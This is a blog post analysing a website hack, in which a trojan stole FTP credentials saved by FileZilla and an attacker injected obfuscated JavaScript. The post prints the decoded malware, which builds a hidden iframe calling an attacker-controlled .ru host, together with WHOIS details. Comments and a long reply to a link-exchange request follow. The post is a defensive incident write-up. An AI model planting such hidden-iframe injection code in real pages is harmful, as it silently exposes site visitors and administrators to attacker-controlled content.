Categories

A sample text widget

Etiam pulvinar consectetur dolor sed malesuada. Ut convallis euismod dolor nec pretium. Nunc ut tristique massa.

Nam sodales mi vitae dolor ullamcorper et vulputate enim accumsan. Morbi orci magna, tincidunt vitae molestie nec, molestie at mi. Nulla nulla lorem, suscipit in posuere in, interdum non magna.

Web Development

Anatomy of a web-site hack

Good post? Please, share it...
Pin It

I recently found myself with a huge amount of  investigative work, to find out all I could, about a customer of mine’s hacked web-site.Hacked website

Of course, I didn’t exclude myself as a possible cause of the problem. Neither did I exclude my client, her assistant, a rogue employee of  the hosting service or a remote third party. In order to make sure that the site was safe, I just had to investigate, as well as take all other necessary security measures.

It all began with a mail from the client, on 8th January, that the hosting service had ‘detected unusual FTP activity’ from a named FTP account and that they had deleted the account. I told the client that I never heard of that account and that this was, in fact, suspicious, as the hosting service had suggested. The client informed me “ok I am on it…”, so I left it alone. I am, after all, as always, extremely busy. I just continued working on the site and my other work.

On 13th January, the client informed me that she had had a warning, from Avast anti-virus program, that a trojan horse had been spotted and that she was unable to log in to the administration interface of the site. Therefore, I took more stringent measures. I investigated the site and found that there were indeed unauthorized changes made to some files on 8th. I told the client and took the site down, immediately. My investigation began.

The trojan was in the Gumbar-family group and officially known as JS:Illredir-B [Trj] The way in which this spreads is as follows: An administrator of the site uses FTP to log into the site. The most common FTP client used is FileZilla. FileZilla stores the account details in a file called sitemanager.xml. It stores everything, including passwords, totally un-encrypted, in plain text.

HackerThis administrator then inadvertedly clicks on something that pops up, without thinking clearly and a trojan is installed on their machine. This trojan transmits the contents of sitemanager.xml to the hacker. The hacker then uses this information to log in to the site and upload a set of altered files, to the site.

These files are: files with the extension .js (javascript) and files with the name Default.php and Index.html. It may also affect files with ‘main’, ‘header’  or ‘footer’ in their names. Many of these contain rogue code, in an obfuscated format. It looks like garbage, but is, in fact, php code that resolves the garbage into javascript. The script forces all administration pages to open a hidden iframe (a web-page within a web-page). The iframe’s URL is a remote php script that should do something with the site, such as transmit customer details, user login details etc.

When I got round to examining the remote script page, the following day, it was empty, so either the hacker disable the script, when he realized that the scam had been exposed or it was never implemented in the first place.

I was able to restore all affected files from a back-up I had made 2 days before the hack, so cleaning the site was not so difficult. Tracing the source of the infection was another issue.

It was then that I noticed that the support person at the hosting service was called ‘jim’ (name changed to protect this individual’s privacy) and that the suspicious FTP activity came from an account called ‘jimtest’. That was the clue I needed. The support person had once created this account to test the installation. He neither deleted the account or removed it from his FTP client’s configuration. When he got the trojan, on 8th January, the hacker was able to get the login details (probably also for a lot of other sites, also) and do the dirty deed. This was quickly noticed by the hosting service, who took the above described action.

This is seriously unprofessional behavior and I find it to be also unprofessional of the hosting service to not tell the truth about this and to provide details. In fact, they will not give me any details, even of the hacked account, which they had deleted, so I can never get to the truth. The above scenario is the only one that I can come up with that fits all the known facts, but I have no evidence, because the hosting service is being so secretive (covering their tracks).

The net result is that I had hours of unnecessary work, the customer had lots of time and money wasted and the site had to be down for 2 days.

I have advised the customer to migrate to a different service.

Here are some details of the hack, for your information:

JavascriptThe script looks like this:

This resolves to:

On the page, this then becomes:

Mowkyfdh = ‘e^&l)a^#&n@))@c@#)e@$(-##c&^o$$(!m^#@##.#))b^$#l#)$o#)#g!@$g&))e^r^.#)&#c@&@o&)m#.()$s@e#&$n)$@d)$s$(p!!a)&(c&@$)e&(-$#c#(o#!@m@!.&)&$t&#e))e!$^@(n^)w@e!@b^(d(#!e##^)s)#i$$!g(@(n&)(.#@^r)@&u((!’.replace(/\^|&|\)|#|\!|@|\(|\$/ig, ”);


That runs a remote script that resolves to:

f = document.createElement(‘iframe’);
f.src = ‘http://’+Mowkyfdh+’:8080/index.php?ys’;
f.style.visibility = ‘h)!$i^!d#@d!e!n)($@’.replace(/&|\$|\^|#|@|\)|\!|\(/ig, ”);
document.body.appendChild(f);

This creates a hidden iframe with the URL ‘http://elance-com.blogger.com.sendspace-com.teenwebdesign.ru:8080/index.php?ys’.

Whois details for this domain:

domain: TEENWEBDESIGN.RU
type: CORPORATE
nserver: ns1.hostserverdirect.com.
nserver: ns2.hostserverdirect.com.
nserver: ns3.hostserverdirect.com.
nserver: ns4.hostserverdirect.com.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
phone: +7 4912 219900
e-mail: dibs@freemailbox.ru
registrar: NAUNET-REG-RIPN
created: 2009.10.28
paid-till: 2010.10.28
source: TCI

The phone number is in Kazakhistan.

I hope that this blog entry may help other web-site owners and webmasters to more easily and quickly detect this particular scam and deal with it appropriately.

I thank the following web-sites for information that helped me to get to the bottom of this story:

Zyenweb.com

JustCoded.com This site provides a removal script, but I prefered to do the clean up manually, even though it took a long time.

Avast forum




17 comments to Anatomy of a web-site hack

  • fantastic issues altogether, you just won a new reader.
    What might you suggest about your put up that you just made a
    few days in the past? Any positive?

  • I believe that is one of the so much vital info for me. And i’m happy studying your article. However should observation on few basic issues, The site style is ideal, the articles is truly excellent : D. Good job, cheers

  • I’m not sure why but this website is loading extremely slow for me. Is anyone else having this issue or is it a problem on my end? I’ll check back later and see if the problem still exists.

  • I was suggested this website by my cousin. I am not sure whether this post is written by him as no one else know such detailed about my difficulty. You are wonderful! Thanks!

  • Simply desire to say your article is as astounding. The clarity in your post is just excellent and I could assume you are an expert on this subject. Well with your permission let me to grab your feed to keep up to date with forthcoming post. Thanks a million and please keep up the gratifying work.

  • I am indeed thankful to you for providing us with this invaluable advise. My spouse and I are actually grateful, specifically the data we needed.

  • Grazie dell’articolo ben descritto!
    Il mio sito è stato attaccato in un modo del genere, tramite il trojan JS:Illredir-CI [Trj]. Avast! lo ha riconosciuto soltanto all inizio di Luglio e lo ha messo nella sua banca dati. In poche parole la soluzione sta 1) nel cambiare la password dell’ftp, 2) tutti i file di javascript devono esser sovvrascritti con un backup. 3) tutti i file di index controllati e sostituiti in caso di necessità. In fondo ai file vi è una stringa java da cancellare. Questo lavoro si dovrebbe fare sul server, visto che non si possono scaricare e aprire i file infetti.
    Ho scritto due cose a riguardo sul mio sito.
    La cosa più brutta dell’attacco è che appena uno si è collegato tramite FTP, il virus infetta tutti i domini dove il programma ftp ha le password salvate. Usavo filezilla.
    http://www.quattrossa.com/news-novita-sito-web/dettagli-news/la-soluzione-al-virus-trojan-jsillredir-ci-trj/93ad19747a6acedd53d2ed8193971a7d/

    Un saluto
    Antonio

  • Excellent content. Thanks for posting.

  • Nice going. Website security is becoming a HUGE issue nowadays, for both static html/css and WordPress blogs. I’ve seen a lot of the IFRAME malware type stuff, and even got hit with it a few times.

    Continued success to you. Great blog!

  • I had read this whole article and it is really superb. Great article I must say. Well as we know today safety must be very important. I think it is very important to understand all things. Superb website and is has been very informative for me.

  • Hey, I think your site is very informative. I found it via Bing. Will definitely come back soon

  • howdy there, i just saw your website listed on google, and i must tell that you express exceptionally well on your website. i am truly struck by the mode that you write, and the subject is outstanding. in any event, i would also like to know whether you would like to exchange links with my web portal? i will be to the great extent than willing to reciprocate and insert your link on in the link exchange area. looking for your answer, thanks and enjoy your day!

    • Ray

      Thanks a lot for your kind comments on my blog entry. It really gives me encouragement to write new entries. Reading such comments are about the only reward I get for doing this, which I do, not for any remuneration, but because I believe in sharing knowledge and building the net by contribution.

      Although my experiences with the company ‘Panda Security’, in the long ago past, have not been positive, mostly on the grounds of low standards in marketing ethics, I concede that companies change over the years, so such ancient experiences are not necessarily a good guideline.

      I proceeded to your website ‘Cyber Circles’ to check on your credentials. At first, I avoided the commercial material and checked your ‘ ‘Privacy’ page. It looked good – simple and clear. Your ‘About Us and Contact Us’ link led to a short paragraph that explained that you are a portal dealing with Panda, which is kind of obvious, anyway. Otherwise you give your basic contact details. However, I could not figure out, from this, what exactly is your connection with ‘Panda Security’. I can only assume you are either an in-house branch of that company or an outsourced arm, on their payroll. Although this is not entirely clear, I presume that you are not an altruistic lover of Panda products, just doing his bit to share the knowledge. Is this correct?

      Then I went to the ‘Links Center’ page (which I presume is what you call, in your comment, the ‘link exchange area’) This is, after all, what this investigation was all about, in the first place. Although all the commercial material worked normally, the links to ‘Panda Security’ software sales included tedious re-directions and 3 cookies. In the end, I arrived at the Panda Security shop.

      Imagine my surprise to find that none of the actual content links – the Link categories, themselves – worked at all. They all led to a 404 error (Page not found)!
      e.g.

      404: Not Found

      Sorry, but the content you requested could not be found

      FILE NOT FOUND: Computers_and_Internet/
      URI:/Computers_and_Internet/

      This is not a good advertisement for your company or PHPLinkDirectory, the system that you seem to be using on your site. I went to their site and found that on their Features page, a number of the listed features had no links. The ones that did, linked back to the Features page, so went nowhere – and this is a company that deals with linking!!!!

      This begs a few questions.

      In the first place, why was this not checked, before launching the site and regularly afterwards? It should at least have been checked, before you placed that comment on my site.

      Secondly, Are you aware of this unacceptable part of your web developer’s delivery of service?

      Thirdly, why would expect me to share a link with a site that is broken, unclear about its role and wholly promotional of a single company’s products?

      Finally, was it clear enough that, given the nature of my knowledge and experience, I always check and report on all this sort of information, before agreeing to share anything with any web-site? Am I being transparent enough about my intention to share any such report with my readers, in this blog.

      Naturally, you have the right to answer this comment with one of your own, rebutting any opinion that I have expressed and/or explain where I am wrong in holding this opinion.

  • Damn, awesome website. I actually came across this on Bing, and I am happy I did. I will definately be returning here more often. Wish I could add to the posts here and bring a bit more to the table, but am just absorbing as much info as I can at the moment.

    Thank You

    Mobile Phones Deals

  • Björn

    Thanks so much for this, I also had this problem and never realised that I needed to change the FTP password 😮

Leave a Reply

You can use these HTML tags

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

  

  

  

This site uses Akismet to reduce spam. Learn how your comment data is processed.